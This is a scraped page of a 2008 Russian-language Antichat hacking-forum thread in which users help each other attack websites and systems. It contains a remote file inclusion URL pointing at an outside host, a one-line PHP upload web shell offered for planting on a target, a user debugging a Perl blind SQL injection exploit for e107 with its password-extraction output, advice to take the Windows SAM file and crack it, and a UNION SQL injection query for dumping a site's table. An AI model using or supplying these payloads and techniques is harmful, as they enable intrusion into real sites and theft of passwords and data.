Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

10.11.2008, 00:37
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
Сообщение от diznt
AFoST неа не пашет
пишу ***.com/test.php?w=http://z0u4.narod.ru/1.php
Не помогает... (даже если выбрать хост с поддержкой php)
Помогайте)
инклудь тхт а не пхп...
|
|
|

10.11.2008, 00:48
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
DimOnOID не помогает... К сожелению покачто не могу дать ресурс где я все это делаю
|
|
|

10.11.2008, 01:13
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
глянь phpinfo() возможно отключен url_include; проверь url_fopen=on/off?
или попробуй так:
Код:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
|
|
|

10.11.2008, 09:46
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме: 461696
Репутация:
40
|
|
Привет всем!
есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php
После того, как изменил $benchmark, вроде заработало, но теперь выдаёт такое:
Код:
[+] e107 <= 0.7.13 Blind SQL Injection
[+] Admin/User's Password Retrieve Exploit
[+] Coded by __GiReX__
[+] Logged in with your account..
[+] Checking database delay, please wait..
[+] Normal delay: 1
[+] Benchmark delay: 13
[+] Victim password: f
[-] Exploit mistake: please re-check benchmark
Я так понимаю, загвоздка где-то здесь:
Код:
for(my $j = 1; $j <= 32; $j++)
{
foreach $char(@cset)
{
info(chr($char), $hash, "password");
my ($pre_time, $post_time) = time();
$rv = check_char($char, $j, "user_password");
$post_time = time();
if($rv and ($post_time - $pre_time) > ($ndelay + 3))
{
$hash .= chr($char);
last;
}
}
last if $j != length($hash);
}
if(not defined $hash or length($hash) != 32)
{
print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
exit;
}
Изменил строку "if(not defined $hash or length($hash) != 32)" на "if(not defined $hash)" и скрипт мне выдал:
Код:
...
[+] Logged in with your account..
[+] Checking database delay, please wait..
[+] Normal delay: 1
[+] Benchmark delay: 13
[+] Victim password: f
[+] You can try to login with this cookie:
[+] Cookie: e107cookie=1.d41d8cd98f00b204e9800998ecf8427e
length(d41d8cd98f00b204e9800998ecf8427e) = 32
Я подставил эти куки, но они не подходят. потом попробовал эксплоит на localhoste и до меня дошло, что он всегда выдаёт один и тот же хэш. В нём зашифрован пароль "".
Так что же делать? как заставить скрипт работать? подскажите плиз, я в программировании не бум-бум.
|
|
|

10.11.2008, 13:04
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Интересует как узнать пароль админа...
Имееться папка WINDOWS при себе
|
|
|

10.11.2008, 14:52
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
иши сам файл а потом бруть саминсайдом
|
|
|

10.11.2008, 15:18
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
http://ru.wikipedia.org/wiki/SAM
|
|
|

10.11.2008, 18:25
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме: 192463
Репутация:
97
|
|
Братцы, выручайте!!!!
Есть некий сайт со sql inj, и вот такой запрос
http://www.site.com/list.php?cat=-41+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name/*
Все данные из таблицы table_name,все которые в ней есть, сразу выводятся на страницу.
Но во многих значение колонки summ10 пустое. Просто после данных из summ9 идёт :: и пусто.
Внимание, вопрос :-)
Как вывести только те данные, в которых значение summ10 не пустое? (их мало, но они есть). Каким запросом?
Выручайте, очень на вас расчитываю.
Последний раз редактировалось Imperou$; 10.11.2008 в 18:27..
|
|
|

10.11.2008, 18:58
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
WHERE summ10 <> ""
|
|
|

10.11.2008, 19:14
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме: 192463
Репутация:
97
|
|
[Raz0r]
Извини, немного не понял.
Это будет выглядеть так?
...+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3 a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name+where+summ10=.../*
?
Покажи пожалуйста на примере запроса.
И ещё, summ10 имеет разные значения, разной длинны.
Например
1435
233
1645
и т.д.
Если использовать +where+summ10=.../*
то ведь необходимо указывать значение summ10.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|